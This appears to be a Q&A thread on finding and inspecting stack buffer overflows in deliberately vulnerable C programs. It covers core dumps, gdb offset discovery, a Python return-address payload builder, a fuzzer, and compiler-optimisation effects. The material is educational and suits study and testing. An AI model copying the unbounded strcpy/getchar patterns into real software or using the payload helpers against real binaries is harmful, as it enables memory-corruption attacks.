Viewing the stack

Getting a dump of memory the simple way

You can simply send your vulnerable process a SIGSEGV (kill -SEGV pid) and, if core dumps are allowed (ulimit -c unlimited), you will get a nice core dump file containing the process memory.

Example:

On terminal #1:

/tmp$ ./test 
idling...
idling...
Segmentation fault <---- HERE I SEND THE 1st SIGSEGV
/tmp$ ulimit -c unlimited
/tmp$ ./test 
idling...
idling...
Segmentation fault (core dumped) <---- HERE IS THE 2nd SIGSEGV
/tmp$ ls test
test    test.c  
/tmp$ ls -lah core 
-rw------- 1 1000 1000 252K Oct 10 17:42 core

On terminal #2:

/tmp$ ps aux|grep test
1000  6529  0.0  0.0   4080   644 pts/1    S+   17:42   0:00 ./test
1000  6538  0.0  0.0  12732  2108 pts/2    S+   17:42   0:00 grep test
/tmp$ kill -SEGV 6529
/tmp$ ps aux|grep test
1000  6539  0.0  0.0   4080   648 pts/1    S+   17:42   0:00 ./test
1000  6542  0.0  0.0  12732  2224 pts/2    S+   17:42   0:00 grep test
/tmp$ kill -SEGV 6539
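
Both steps, raising the core-size limit and delivering SIGSEGV from outside, can also be scripted. Here is a minimal Python sketch, assuming Linux/POSIX. The function names are hypothetical, and `sleep 30` can stand in for the idling ./test program, whose source is not shown. Where the core file lands is decided by /proc/sys/kernel/core_pattern, so on systems using systemd-coredump it may not appear in the current directory.

```python
import resource
import signal
import subprocess


def allow_core_dumps():
    """Like `ulimit -c unlimited`, but capped at the hard limit: raise the soft
    RLIMIT_CORE as far as an unprivileged process is allowed to."""
    _soft, hard = resource.getrlimit(resource.RLIMIT_CORE)
    resource.setrlimit(resource.RLIMIT_CORE, (hard, hard))


def segv_with_core(argv, allow_core=True):
    """Start argv, send it SIGSEGV (like `kill -SEGV pid`), return its return code."""
    # preexec_fn runs in the child between fork() and exec(), so only the
    # child's core-size limit changes, not ours.
    child = subprocess.Popen(argv, preexec_fn=allow_core_dumps if allow_core else None)
    child.send_signal(signal.SIGSEGV)
    # subprocess reports "killed by signal N" as return code -N
    return child.wait()
```

For example, segv_with_core(["sleep", "30"]) should return -11 on Linux, where SIGSEGV is signal 11. Unlike `ulimit -c unlimited`, this only raises the soft limit up to the hard one, which is all an unprivileged process can do.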

Note that this gives you a dump of the process state at the moment the binary received the SIGSEGV. So if your binary consists of main() and evil_function(), and your program was running evil_function() when the SIGSEGV arrived, you will get the stack of evil_function(). You can still inspect the surrounding memory (or walk up the frames in gdb) to get back to main()'s stack.

A good reference on all of this is Aleph One's paper "Smashing The Stack For Fun And Profit": http://insecure.org/stf/smashstack.html

Guessing the "mapping" by yourself

Suppose your binary contains a basic buffer overflow, like in this code snippet:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>


int evil_function(char *evil_input)
{
    char stack_buffer[10];
    strcpy(stack_buffer, evil_input);  /* no bounds check: more than 9 chars overflows */
    printf("input is: %s\n", stack_buffer);
    return 0;
}


int main (int ac, char **av)
{
    if (ac != 2) 
    {
        printf("Wrong parameter count.\nUsage: %s: <string>\n",av[0]);
        return EXIT_FAILURE;
    }
    evil_function(av[1]);

    return (EXIT_SUCCESS);
}

It's quite simple to guess where you should write your buffer address just by using gdb. Let's try it with the example program above:

/tmp/bo-test$ ./test-buffer-overflow $(perl -e "print 'A'x10")
input is: AAAAAAAAAA
/tmp/bo-test$ ./test-buffer-overflow $(perl -e "print 'A'x11")
input is: AAAAAAAAAAA
/tmp/bo-test$ ./test-buffer-overflow $(perl -e "print 'A'x12")
input is: AAAAAAAAAAAA
/tmp/bo-test$ ./test-buffer-overflow $(perl -e "print 'A'x13")
input is: AAAAAAAAAAAAA
/tmp/bo-test$ ./test-buffer-overflow $(perl -e "print 'A'x14")
input is: AAAAAAAAAAAAAA
/tmp/bo-test$ ./test-buffer-overflow $(perl -e "print 'A'x15")
input is: AAAAAAAAAAAAAAA
/tmp/bo-test$ ./test-buffer-overflow $(perl -e "print 'A'x16")
input is: AAAAAAAAAAAAAAAA
Segmentation fault (core dumped)
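
The manual loop above (one more 'A' per run until the program dies) is easy to automate. A Python sketch in the spirit of the fuzzing script further down; the function name and the 64-character cap are arbitrary choices. A negative return code is how subprocess reports that the child was killed by a signal.

```python
import subprocess


def find_crash_length(argv, max_len=64, filler="A"):
    """Run argv + [filler * n] for n = 1, 2, ... and return the first n whose
    run is killed by a signal (negative return code), or None."""
    for n in range(1, max_len + 1):
        ret = subprocess.run(argv + [filler * n], stdout=subprocess.DEVNULL).returncode
        if ret < 0:
            return n
    return None
```

With a build that behaves like the one in this transcript, find_crash_length(["./test-buffer-overflow"]) would return 16; a different compiler or different flags may give another number.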

Ok, so the stack starts getting messed up with 16 characters, i.e. 6 extra characters beyond the 10-byte buffer... Let's have a look at the stack:

/tmp/bo-test$ gdb test-buffer-overflow core
GNU gdb (Debian 7.7.1+dfsg-5) 7.7.1
[...]
Core was generated by `./test-buffer-overflow AAAAAAAAAAAAAAAA'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x00007f2cb2c46508 in ?? () from /lib/x86_64-linux-gnu/libc.so.6
(gdb) bt
#0  0x00007f2cb2c46508 in ?? () from /lib/x86_64-linux-gnu/libc.so.6
#1  0x0000000000000000 in ?? ()
(gdb) Quit

Let's continue feeding it more extra characters:

/tmp/bo-test$ ./test-buffer-overflow $(perl -e "print 'A'x26")
input is: AAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)
/tmp/bo-test$ gdb test-buffer-overflow core
GNU gdb (Debian 7.7.1+dfsg-5) 7.7.1
[...]
Core was generated by `./test-buffer-overflow AAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x0000000000004141 in ?? ()
(gdb) 

Hey ... look at this address: 0x0000000000004141! 0x41 is the hex ASCII code for ... 'A' :p We just overwrote the return (RET) address :) Now, one last attempt, just to see:

/tmp/bo-test$ ./test-buffer-overflow AAAAAAAAAAAAAAAAAAAAAAAAABCDEFGHI
input is: AAAAAAAAAAAAAAAAAAAAAAAAABCDEFGHI
Segmentation fault (core dumped)
/tmp/bo-test$ gdb test-buffer-overflow core
GNU gdb [...]
Core was generated by `./test-buffer-overflow AAAAAAAAAAAAAAAAAAAAAAAAABCDEFGHI'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x0000000000400581 in evil_function (
    evil_input=0x7fff7e2712a6 'A' <repeats 25 times>, "BCDEFGHI")
    at test-buffer-overflow.c:12
12  }
(gdb) bt
#0  0x0000000000400581 in evil_function (
    evil_input=0x7fff7e2712a6 'A' <repeats 25 times>, "BCDEFGHI")
    at test-buffer-overflow.c:12
#1  0x4847464544434241 in ?? ()
#2  0x00007fff7e260049 in ?? ()
#3  0x0000000200000000 in ?? ()
#4  0x0000000000000000 in ?? ()

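This time, look at the address in frame #1: 0x4847464544434241. x86-64 is little-endian, so in memory those bytes are 41 42 43 44 45 46 47 48, i.e. "ABCDEFGH": the saved return address starts at the 25th character of the input (offset 24). Now you know exactly where to write ...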
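
Turning the leaked value into an offset is mechanical: pack it as a little-endian 64-bit integer and search for those bytes in the input. A Python sketch with hypothetical helper names. build_payload also accounts for strcpy() stopping at the first NUL byte, assuming (as here) that the upper bytes of the original return address are already zero; the target address you pass it is your own choice.

```python
import struct


def as_memory_bytes(value):
    """The 8 bytes of a 64-bit value as stored in memory on little-endian x86-64."""
    return struct.pack("<Q", value)


def offset_of(payload, leaked_value):
    """Where in payload the bytes of leaked_value start (-1 if they don't appear)."""
    return payload.find(as_memory_bytes(leaked_value))


def build_payload(offset, target):
    """Padding up to offset, then target's little-endian bytes. strcpy() stops at
    the first NUL, so trailing zero bytes are dropped: strcpy's own terminator
    writes one of them and the rest are assumed to be zero already."""
    addr = as_memory_bytes(target).rstrip(b"\x00")
    if b"\x00" in addr:
        raise ValueError("target contains a NUL byte that strcpy() cannot copy")
    return b"A" * offset + addr


payload = b"A" * 25 + b"BCDEFGHI"
print(as_memory_bytes(0x4847464544434241))      # b'ABCDEFGH'
print(offset_of(payload, 0x4847464544434241))   # 24
print(as_memory_bytes(0x4141))                  # b'AA\x00\x00\x00\x00\x00\x00'
```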


@binarym's answer is pretty good. He already explains the reasons behind a buffer overflow, how to find a simple overflow and how to look at the stack using a core file and/or GDB. I just want to add two extra details:

  1. A more in-depth black-box test example, i.e. this:

     a description of how to consistently detect buffer overflows (black-box testing)

  2. Compiler quirks, i.e. where black-box testing fails (or, more precisely, where a payload generated by black-box testing may fail).

The code we will use is a little more complex:

#include <stdio.h>
#include <string.h>

void do_post(void)
{
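    char curr = 0, message[128] = {};  /* NB: getchar() returns int; a char cannot reliably hold EOF */
    int i = 0;
    while (EOF != (curr = getchar())) {
        if ('\n' == curr) {
            message[i] = 0;
            break;
        } else {
            message[i] = curr;  /* no bounds check on i: this overflows message[128] */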
        }
        i++;
    }
    printf("I got your message, it is: %s\n", message);
    return;
}

int main(void)
{
    char curr = 0, request[8] = {};
    int i = 0;
    while (EOF != (curr = getchar())) {
        request[i] = curr;
        if (!strcmp(request, "GET\n")) {
            printf("It's a GET!\n");
            return 0;
        } else if (!strcmp(request, "POST\n")) {
            printf("It's a POST, get the message\n");
            do_post();
            return 0;
        } else if (5 < strlen(request)) {
            printf("Some rubbish\n");
            return 1;
        }  /* else keep reading */
        i++;
    }
    printf("Assertion error, THIS IS A BUG please report it\n");
    return 0;
}

I'm poking fun at HTTP with POST and GET requests, and I am using getchar() to read STDIN character by character (a poor implementation, but an educational one). The code distinguishes between GET, POST and "rubbish" (anything else), and does so using a more-or-less properly written loop (without overflows).

Yet, when parsing the POST message there is an overflow in the message[128] buffer. Unfortunately that buffer is deep inside the program (well, not really that deep, but simply sending a long input will not reach it). Let's compile it and try long strings:

[~]$ gcc -O2 -o over over.c
[~]$ perl -e 'print "A"x2000' | ./over 
Some rubbish

Yeah, that does not work. Since we know the code, we know that prefixing the input with "POST\n" will trigger the overflow. But what if we do not know the code? Or if the code is too complex? Enter black-box testing.

Black Box Testing

The most popular black-box testing technique is fuzzing, and almost all other black-box techniques are variations of it. Fuzzing is simply feeding the program random input until we find something interesting. I wrote a simple fuzzing script to check this program; let's look at it:

#!/usr/bin/env python3

from itertools import product
from subprocess import Popen, PIPE, DEVNULL
import sys

prog = './over'
valid_returns = [ 0, 1 ]

all_chars = list(map(chr, range(256)))
# This assumes that we may find something with an input as small as 1024 bytes,
# which isn't realistic.  In the real world several megabytes of input need to
# be tried.
for input_size in range(1,1024):
    # Every combination of input_size characters, all held in memory at once.
    inputs = [p for p in product(all_chars, repeat=input_size)]
    for single_input in inputs:
        child = Popen(prog, stdin=PIPE, stdout=DEVNULL)
        # Characters above 127 become two bytes once UTF-8 encoded.
        byte_input = (''.join(single_input)).encode("utf-8")
        # communicate() writes the input, closes stdin and waits for the child.
        child.communicate(input=byte_input)
        ret = child.returncode
        if ret not in valid_returns:
            print("INPUT", repr(byte_input), "RETURN", ret)
            sys.exit(0)

# The exit(0) is not realistic either, in the real world I'd like to have a
# full log of the entire search space.

It simply feeds increasingly big inputs to the program. (WARNING: the script requires a good deal of RAM.) I ran this and after a few hours I got an interesting output:

INPUT b"POST\nXl_/.\xc3\x93\xc3\x90\xc2\x87\xc3\xa6dh\xc3\xaeH\xc2\xa0\xc2\x836\x16.\xc3\xb7\x1be\x1e,\xc3\x98\xc3\xa4\xc2\x81\xc2\x83 su\xc2\xb1\xc3\xb2\xc3\x8d^\xc2\xbc\xc2\xa11/\xc2\x9f\x12vY\x12[0\x0c]\xc3\xb6\x19zI\xc2\xb8\xc2\xb5\xc3\xbb\xc2\x9e\xc3\xab>^\xc2\x85\xc2\x91\xc2\xb5\xc2\xb5\xc3\xb6u\xc3\x8e).\xc3\xbcn\x1aM\xc3\xbb+{\x1c\xc3\x9a\xc3\x8b&\xc2\x93\xc2\xa1D\xc3\xad\xc3\xad\xc3\x81\xc2\xbd\xc2\x8d\xc2\xa3 \xc3\x87_\xc2\x82\xc3\x9asv\xc3\x92\xc2\x85IP\xc2\xb8\x1bS\xc3\xbe\xc3\x9e\\\xc2\x8e\xc3\x9f\xc2\xb1\xc3\xa4\xc2\xbe\x1fue\xc3\x81\xc3\x8a\xc2\x8b'\xc3\xaf\xc2\xa1\xc3\x95'\xc2\xaa\xc3\xa8P\xc2\xa7\xc2\x8f\xc3\x99\xc2\x94S5\xc2\x83\xc3\x85U" RETURN -11

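The process exited with -11. Python's subprocess reports a negative return code -N when the child was killed by signal N, so is signal 11 a segfault? Let's see: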

kill -l | grep SIGSEGV
11) SIGSEGV 12) SIGUSR2 13) SIGPIPE 14) SIGALRM 15) SIGTERM

It is a segmentation fault alright (see this answer for clarification). Now I have an input sample which I can use to reproduce this segfault and discover (with GDB) where the overflow is.
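
The script above enumerates every combination of each size, so in practice it only covers very short inputs (there are already 256**3, about 16.8 million, inputs of length 3). Below is a sketch of a random (rather than exhaustive) fuzzer that feeds raw bytes instead of UTF-8 encoded characters, optionally prefixed by a seed such as "POST\n", and that names the signal behind a negative return code. The function names, parameters and the seed idea are assumptions for illustration, not the script that produced the output above. A seed is also a small cheat: a pure black-box tester would have to learn "POST\n" from somewhere (documentation, captured traffic).

```python
import random
import signal
import subprocess


def describe_return(ret):
    """Translate a subprocess return code into words (POSIX semantics:
    -N means the child was killed by signal N)."""
    if ret < 0:
        return "killed by " + signal.Signals(-ret).name
    return "exited with status %d" % ret


def fuzz(argv, seeds=(b"",), valid_returns=(0, 1), max_size=1024,
         tries_per_size=10, rng=None):
    """Feed seed + random bytes of growing size to argv's stdin.
    Returns (input, return code) for the first run whose return code is not
    in valid_returns, or None if nothing was found."""
    if rng is None:
        rng = random.Random()
    for size in range(1, max_size + 1):
        for _ in range(tries_per_size):
            tail = bytes(rng.randrange(256) for _ in range(size))
            data = rng.choice(seeds) + tail
            ret = subprocess.run(argv, input=data, stdout=subprocess.DEVNULL).returncode
            if ret not in valid_returns:
                return data, ret
    return None
```

Against the example, something like fuzz(["./over"], seeds=[b"POST\n"]) should eventually report a run whose describe_return() is "killed by SIGSEGV", provided the build is one where the overflow reaches the return address (as with -O2 below). Random tails containing a newline end the message early, so expect a number of harmless runs first.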

Compiler quirks

Did you see something strange above? There is a piece of information I glossed over; go back and try to figure it out before reading on. Here it is:

Why the hell did I use gcc -O2 -o over over.c? Why is a plain gcc -o over over.c not enough? What is so special about compiler optimisation (-O2) in this context?

To be fair, I myself found it astonishing that I could find this behaviour in such a simple program. Compilers rewrite a good deal of code during compilation, for performance reasons. Compilers also do try to mitigate several risks (e.g. clearly visible overflows). Often the same code may look very different with and without optimisation enabled.

Let's look at this specific quirk, going back to perl since we already know the vulnerability:

[~]$ gcc -O2 -o over over.c
[~]$ perl -e 'print "POST\n" . "A"x2000' | ./over 
It's a POST, get the message
I got your message, it is: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAins
Segmentation fault (core dumped)

Yes, that is exactly what we expected. But now, let's disable optimisation:

[~]$ gcc -o over over.c
[~]$ perl -e 'print "POST\n" . "A"x2000' | ./over 
It's a POST, get the message
I got your message, it is: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAÿ}
$ echo $?
0

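What the hell! It looks as if the compiler patched the vulnerability I crafted with so much love. If you look at the length of that message you will see that it is 141 bytes long: the buffer did overflow, but something stopped the writes before they reached anything important such as the return address. One likely culprit (not verified against the generated assembly here) is that without optimisation the loop index i is kept on the stack next to message, so the overflow overwrites i itself and the following writes land back inside the buffer, whereas with -O2 i lives in a register and the writes run on into the return address.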
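
One way to picture how an unoptimised build can survive is a toy model of do_post()'s frame in which the loop index i is spilled to the stack right after message, so the overflow rewrites i itself. Everything about this layout is an assumption for illustration (frame size, the offset of i, the fake saved return address 0x400581); the real frame gcc builds will differ, and so will the exact length of the printed message. The point is only the mechanism: with i on the stack the writes wrap around, with i in a register they run straight into the return address.

```python
SAVED_RET = 0x400581  # hypothetical saved return address


def simulate_do_post(payload, i_on_stack, frame_size=160, i_offset=128):
    """Toy model of do_post()'s stack frame: message[] at offset 0, a 4-byte
    little-endian copy of i at i_offset (only used when i_on_stack is True),
    and a pretend saved return address in the last 8 bytes."""
    frame = bytearray(frame_size)
    frame[-8:] = SAVED_RET.to_bytes(8, "little")
    i = 0
    for ch in payload:
        if i_on_stack:
            i = int.from_bytes(frame[i_offset:i_offset + 4], "little")
        if i >= frame_size:
            break  # the model stops at the end of the frame
        frame[i] = ch  # message[i] = curr, with no bounds check
        if i_on_stack:
            # i++ re-reads i from the stack, which the write above may have hit
            i = int.from_bytes(frame[i_offset:i_offset + 4], "little") + 1
            frame[i_offset:i_offset + 4] = i.to_bytes(4, "little")
        else:
            i += 1
    return frame


payload = b"A" * 2000
print(bytes(simulate_do_post(payload, i_on_stack=False)[-8:]))  # b'AAAAAAAA'
print(simulate_do_post(payload, i_on_stack=True)[-8:] == SAVED_RET.to_bytes(8, "little"))  # True
```

In the stack case, writing 'A' over the low byte of i turns 128 into 0x41 (65), so the loop keeps cycling through message[66..128] and never gets near the return address.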

For the skeptics, here is the compiler version I'm using to get the behavior above:

[~]$ gcc --version
gcc (GCC) 6.2.1 20160830
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

The moral of the story is that a buffer overflow payload often only works if the program is compiled by the same compiler with the same optimisation level (or even the same other flags). Compilers do evil things to your code to make it run faster, and although there is a good chance that a payload will work on the same program compiled by two compilers, it is not guaranteed.

Postscript

I wrote this answer for fun and to keep a record for myself. I do not deserve the bounty because I do not fully answer your question; I only answer the extra question added in the bounty definition. binarym's answer deserves the bounty because he answers more parts of the original question.